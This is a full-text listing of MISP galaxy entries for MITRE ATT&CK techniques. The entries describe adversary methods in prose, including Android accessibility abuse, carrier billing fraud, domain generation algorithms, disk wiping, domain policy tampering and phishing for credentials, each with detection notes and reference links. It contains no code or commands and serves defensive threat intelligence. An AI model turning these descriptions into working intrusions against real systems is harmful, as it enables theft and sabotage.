An adversary with control of a target’s Google account can use the Google Play Store’s remote installation capability to install apps onto the Android devices associated with the Google account as described in (Citation: Oberheide-RemoteInstall), (Citation: Konoth). However, only applications that are available for download through the Google Play Store can be remotely installed using this technique.

Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted or known insecure or malicious apps on devices.

Platforms: Android

The tag is: misp-galaxy:mitre-attack-pattern="Remotely Install Application - T1443"

View relationships graph

Remotely Install Application - T1443 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

Table 3608. Table References
Links
https://attack.mitre.org/techniques/T1443

Abuse Accessibility Features - T1453

This technique has been deprecated. Please use [Input Capture](https://attack.mitre.org/techniques/T1417), [Input Injection](https://attack.mitre.org/techniques/T1516), and [Input Prompt](https://attack.mitre.org/techniques/T1411) where appropriate.

A malicious app could abuse Android’s accessibility features to capture sensitive data or perform other malicious actions.(Citation: Skycure-Accessibility)

Adversaries may abuse accessibility features on Android to emulate a user’s clicks, for example to steal money from a user’s bank account.(Citation: android-trojan-steals-paypal-2fa)(Citation: banking-trojans-google-play)

Adversaries may abuse accessibility features on Android devices to evade defenses by repeatedly clicking the "Back" button when a targeted app manager or mobile security app is launched, or when strings suggesting uninstallation are detected in the foreground. This effectively prevents the malicious application from being uninstalled.(Citation: android-trojan-steals-paypal-2fa)

The tag is: misp-galaxy:mitre-attack-pattern="Abuse Accessibility Features - T1453"

Table 3609. Table References
Links
https://attack.mitre.org/techniques/T1453
https://www.skycure.com/blog/accessibility-clickjacking/
https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/
https://www.welivesecurity.com/2018/10/24/banking-trojans-continue-surface-google-play/

Access Calendar Entries - T1435

An adversary could call standard operating system APIs from a malicious application to gather calendar entry data, or with escalated privileges could directly access files containing calendar data.

The tag is: misp-galaxy:mitre-attack-pattern="Access Calendar Entries - T1435"

Table 3610. Table References
Links
https://attack.mitre.org/techniques/T1435
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

Create custom payloads - T1345

A payload is the part of the malware which performs a malicious action. The adversary may create custom payloads when none exist with the needed capability or when targeting a specific environment. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Create custom payloads - T1345"

Table 3611. Table References
Links
https://attack.mitre.org/techniques/T1345

Manipulate Device Communication - T1463

If network traffic between the mobile device and a remote server is not securely protected, then an attacker positioned on the network may be able to manipulate network communication without being detected. For example, FireEye researchers found in 2014 that 68% of the top 1,000 free applications in the Google Play Store had at least one Transport Layer Security (TLS) implementation vulnerability potentially opening the applications' network traffic to adversary-in-the-middle attacks (Citation: FireEye-SSL).

The tag is: misp-galaxy:mitre-attack-pattern="Manipulate Device Communication - T1463"

Table 3612. Table References
Links
https://attack.mitre.org/techniques/T1463
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html
https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html

Commonly Used Port - T1436

Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection.

They may use commonly open ports such as

TCP:80 (HTTP)
TCP:443 (HTTPS)
TCP:25 (SMTP)
TCP/UDP:53 (DNS)

They may use the protocol associated with the port or a completely different protocol.

The tag is: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1436"

Table 3613. Table References
Links
https://attack.mitre.org/techniques/T1436

Domain Generation Algorithms - T1483

Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1483"

View relationships graph

Domain Generation Algorithms - T1483 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"

Table 3614. Table References
Links
https://attack.mitre.org/techniques/T1483
http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
http://csis.pace.edu/_{ctappert/srd2017/2017PDF/d4.pdf[http://csis.pace.edu/}ctappert/srd2017/2017PDF/d4.pdf]
https://arxiv.org/pdf/1611.00791.pdf

Alternate Network Mediums - T1438

Adversaries can communicate using cellular networks rather than enterprise Wi-Fi in order to bypass enterprise network monitoring systems. Adversaries may also communicate using other non-Internet Protocol mediums such as SMS, NFC, or Bluetooth to bypass network monitoring systems.

The tag is: misp-galaxy:mitre-attack-pattern="Alternate Network Mediums - T1438"

Table 3615. Table References
Links
https://attack.mitre.org/techniques/T1438
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html

Transmitted Data Manipulation - T1493

The tag is: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1493"

View relationships graph

Transmitted Data Manipulation - T1493 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1565.002" with estimative-language:likelihood-probability="almost-certain"

Table 3616. Table References
Links
https://attack.mitre.org/techniques/T1493
https://content.fireeye.com/apt/rpt-apt38
https://www.justice.gov/opa/press-release/file/1092091/download

Subvert Trust Controls - T1553

Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.

Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates)

The tag is: misp-galaxy:mitre-attack-pattern="Subvert Trust Controls - T1553"

Table 3617. Table References
Links
https://attack.mitre.org/techniques/T1553
https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf
https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/
http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates
https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec

Revert Cloud Instance - T1536

An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be easily facilitated using restoration from VM or data storage snapshots through the cloud management dashboard. Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the latter types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)

The tag is: misp-galaxy:mitre-attack-pattern="Revert Cloud Instance - T1536"

View relationships graph

Revert Cloud Instance - T1536 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Revert Cloud Instance - T1578.004" with estimative-language:likelihood-probability="almost-certain"

Table 3618. Table References
Links
https://attack.mitre.org/techniques/T1536
https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/
https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots

Test callback functionality - T1356

Callbacks are malware communications seeking instructions. An adversary will test their malware to ensure the appropriate instructions are conveyed and the callback software can be reached. (Citation: LeeBeaconing)

The tag is: misp-galaxy:mitre-attack-pattern="Test callback functionality - T1356"

Table 3619. Table References
Links
https://attack.mitre.org/techniques/T1356

Cloud Service Dashboard - T1538

An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)

Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Service Dashboard - T1538"

Table 3620. Table References
Links
https://attack.mitre.org/techniques/T1538
https://cloud.google.com/security-command-center/docs/quickstart-scc-dashboard
https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html

Disseminate removable media - T1379

Removable media containing malware can be injected in to a supply chain at large or small scale. It can also be physically placed for someone to find or can be sent to someone in a more targeted manner. The intent is to have the user utilize the removable media on a system where the adversary is trying to gain access. (Citation: USBMalwareAttacks) (Citation: FPDefendNewDomain) (Citation: ParkingLotUSB)

The tag is: misp-galaxy:mitre-attack-pattern="Disseminate removable media - T1379"

Table 3621. Table References
Links
https://attack.mitre.org/techniques/T1379

Spearphishing for Information - T1397

Spearphishing for information is a specific variant of spearphishing. Spearphishing for information is different from other forms of spearphishing in that it it doesn’t leverage malicious code. All forms of spearphishing are elctronically delivered social engineering targeted at a specific individual, company, or industry. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials, without involving malicious code. Spearphishing for information frequently involves masquerading as a source with a reason to collect information (such as a system administrator or a bank) and providing a user with a website link to visit. The given website often closely resembles a legitimate site in appearance and has a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Spearphishing for information may also try to obtain information directly through the exchange of emails, instant messengers or other electronic conversation means. (Citation: ATTACKREF GRIZZLY STEPPE JAR)

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing for Information - T1397"

Table 3622. Table References
Links
https://attack.mitre.org/techniques/T1397

Remote File Copy - T1544

Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or onto the victim’s device.

The tag is: misp-galaxy:mitre-attack-pattern="Remote File Copy - T1544"

Table 3623. Table References
Links
https://attack.mitre.org/techniques/T1544

Malicious SMS Message - T1454

An SMS message could contain content designed to exploit vulnerabilities in the SMS parser on the receiving device. For example, Mulliner and Miller demonstrated such an attack against the iPhone in 2009 as described in (Citation: Forbes-iPhoneSMS).

An SMS message could also contain a link to a web site containing malicious content designed to exploit the device web browser.

As described by SRLabs in (Citation: SRLabs-SIMCard), vulnerable SIM cards may be remotely exploited and reprogrammed via SMS messages.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Malicious SMS Message - T1454"

Table 3624. Table References
Links
https://attack.mitre.org/techniques/T1454

Supply Chain Compromise - T1474

As further described in [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Somewhat related, adversaries could also identify and exploit inadvertently present vulnerabilities. In many cases, it may be difficult to be certain whether exploitable functionality is due to malicious intent or simply inadvertent mistake.

Third-party libraries incorporated into mobile apps could contain malicious behavior, privacy-invasive behavior, or exploitable vulnerabilities. An adversary could deliberately insert malicious behavior or could exploit inadvertent vulnerabilities. For example, security issues have previously been identified in third-party advertising libraries incorporated into apps.(Citation: NowSecure-RemoteCode)(Citation: Grace-Advertisement).

The tag is: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474"

Table 3625. Table References
Links
https://attack.mitre.org/techniques/T1474
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-6.html
https://www.nowsecure.com/blog/2015/06/15/a-pattern-for-remote-code-execution-using-arbitrary-file-writes-and-multidex-applications/
https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/WISEC12_ADRISK.pdf

Delete Device Data - T1447

Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location. (Citation: Android DevicePolicyManager 2019)

Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The impact file deletion will have depends on the type of data as well as the goals and objectives of the adversary, but can include deleting update files to evade detection or deleting attacker-specified files for impact.

The tag is: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447"

Table 3626. Table References
Links
https://attack.mitre.org/techniques/T1447
https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html

Carrier Billing Fraud - T1448

A malicious app may trigger fraudulent charges on a victim’s carrier billing statement in several different ways, including SMS toll fraud and SMS shortcodes that make purchases.

Performing SMS fraud relies heavily upon the fact that, when making SMS purchases, the carriers perform device verification but not user verification. This allows adversaries to make purchases on behalf of the user, with little or no user interaction.(Citation: Google Bread)

Malicious applications may also perform toll billing, which occurs when carriers provide payment endpoints over a web page. The application connects to the web page over cellular data so the carrier can directly verify the number, or the application must retrieve a code sent via SMS and enter it into the web page.(Citation: Google Bread)

On iOS, apps cannot send SMS messages.

On Android, apps must hold the SEND_SMS permission to send SMS messages. Additionally, Android version 4.2 and above has mitigations against this threat by requiring user consent before allowing SMS messages to be sent to premium numbers (Citation: AndroidSecurity2014).

The tag is: misp-galaxy:mitre-attack-pattern="Carrier Billing Fraud - T1448"

Table 3627. Table References
Links
https://attack.mitre.org/techniques/T1448
https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html
https://static.googleusercontent.com/media/source.android.com/en//security/reports/Google_Android_Security_2014_Report_Final.pdf

Domain Policy Modification - T1484

Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.

With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).

Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Policy Modification - T1484"

Table 3628. Table References
Links
https://attack.mitre.org/techniques/T1484
https://adsecurity.org/?p=2716
https://wald0.com/?p=179
http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml
https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/
https://www.sygnia.co/golden-saml-advisory
https://us-cert.cisa.gov/ncas/alerts/aa21-008a
https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365

Runtime Data Manipulation - T1494

Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1042) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1494"

View relationships graph

Runtime Data Manipulation - T1494 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1565.003" with estimative-language:likelihood-probability="almost-certain"

Table 3629. Table References
Links
https://attack.mitre.org/techniques/T1494
https://content.fireeye.com/apt/rpt-apt38
https://www.justice.gov/opa/press-release/file/1092091/download

Exploit Baseband Vulnerability - T1455

A message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi or other) to the mobile device could exploit a vulnerability in code running on the device.

Komaromy and N. Golde demonstrated baseband exploitation of a Samsung mobile device at the PacSec 2015 security conference (Citation: Register-BaseStation).

Weinmann described and demonstrated "the risk of remotely exploitable memory corruptions in cellular baseband stacks." (Citation: Weinmann-Baseband)

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Exploit Baseband Vulnerability - T1455"

View relationships graph

Exploit Baseband Vulnerability - T1455 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Exploit via Radio Interfaces - T1477" with estimative-language:likelihood-probability="almost-certain"

Table 3630. Table References
Links
https://attack.mitre.org/techniques/T1455

Event Triggered Execution - T1546

Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries.

Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)

Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges.

The tag is: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1546"

Table 3631. Table References
Links
https://attack.mitre.org/techniques/T1546
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/

Malicious Media Content - T1457

Content of a media (audio or video) file could be designed to exploit vulnerabilities in parsers on the mobile device, as for example demonstrated by the Android Stagefright vulnerability (Citation: Zimperium-Stagefright).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Malicious Media Content - T1457"

View relationships graph

Malicious Media Content - T1457 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1456" with estimative-language:likelihood-probability="almost-certain"

Table 3632. Table References
Links
https://attack.mitre.org/techniques/T1457

Hijack Execution Flow - T1574

Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.

There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.

The tag is: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574"

Table 3633. Table References
Links
https://attack.mitre.org/techniques/T1574
https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

Disk Structure Wipe - T1487

Adversaries may corrupt or wipe the disk data structures on hard drive necessary to boot systems; targeting specific critical systems as well as a large number of systems in a network to interrupt availability to system and network resources.

Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1487) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1488) if all sectors of a disk are wiped.

To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1487"

View relationships graph

Disk Structure Wipe - T1487 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002" with estimative-language:likelihood-probability="almost-certain"

Table 3634. Table References
Links
https://attack.mitre.org/techniques/T1487
https://www.symantec.com/connect/blogs/shamoon-attacks
https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html
http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf
https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/

Disk Content Wipe - T1488

Adversaries may erase the contents of storage devices on specific systems as well as large numbers of systems in a network to interrupt availability to system and network resources.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Novetta Blockbuster Destructive Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1488"

View relationships graph

Disk Content Wipe - T1488 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1561.001" with estimative-language:likelihood-probability="almost-certain"

Table 3635. Table References
Links
https://attack.mitre.org/techniques/T1488
https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf
https://www.justice.gov/opa/press-release/file/1092091/download

Modify Authentication Process - T1556

Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).

Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.

The tag is: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556"

Table 3636. Table References
Links
https://attack.mitre.org/techniques/T1556
https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
https://www.secureworks.com/research/skeleton-key-malware-analysis
https://xorrior.com/persistent-credential-theft/
https://technet.microsoft.com/en-us/library/dn487457.aspx

Uninstall Malicious Application - T1576

Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by:

Abusing device owner permissions to perform silent uninstallation using device owner API calls.
Abusing root permissions to delete files from the filesystem.
Abusing the accessibility service. This requires an intent be sent to the system to request uninstallation, and then abusing the accessibility service to click the proper places on the screen to confirm uninstallation.

The tag is: misp-galaxy:mitre-attack-pattern="Uninstall Malicious Application - T1576"

Table 3637. Table References
Links
https://attack.mitre.org/techniques/T1576
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-43.html

Compromise Application Executable - T1577

Adversaries may modify applications installed on a device to establish persistent access to a victim. These malicious modifications can be used to make legitimate applications carry out adversary tasks when these applications are in use.

There are multiple ways an adversary can inject malicious code into applications. One method is by taking advantages of device vulnerabilities, the most well-known being Janus, an Android vulnerability that allows adversaries to add extra bytes to APK (application) and DEX (executable) files without affecting the file’s signature. By being able to add arbitrary bytes to valid applications, attackers can seamlessly inject code into genuine executables without the user’s knowledge.(Citation: Guardsquare Janus)

Adversaries may also rebuild applications to include malicious modifications. This can be achieved by decompiling the genuine application, merging it with the malicious code, and recompiling it.(Citation: CheckPoint Agent Smith)

Adversaries may also take action to conceal modifications to application executables and bypass user consent. These actions include altering modifications to appear as an update or exploiting vulnerabilities that allow activities of the malicious application to run inside a system application.(Citation: CheckPoint Agent Smith)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Application Executable - T1577"

Table 3638. Table References
Links
https://attack.mitre.org/techniques/T1577
https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures
https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/

Search Closed Sources - T1597

Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)

Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: misp-galaxy:mitre-attack-pattern="Search Closed Sources - T1597"

Table 3639. Table References
Links
https://attack.mitre.org/techniques/T1597
https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/

Phishing for Information - T1598

Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.

All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.

Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.

The tag is: misp-galaxy:mitre-attack-pattern="Phishing for Information - T1598"

Table 3640. Table References
Links
https://attack.mitre.org/techniques/T1598
https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html
https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages
https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
https://github.com/ryhanson/phishery
https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

Network Boundary Bridging - T1599

Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.

Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.

When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.

The tag is: misp-galaxy:mitre-attack-pattern="Network Boundary Bridging - T1599"

Table 3641. Table References
Links
https://attack.mitre.org/techniques/T1599

At (Linux) - T1053.001

Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)

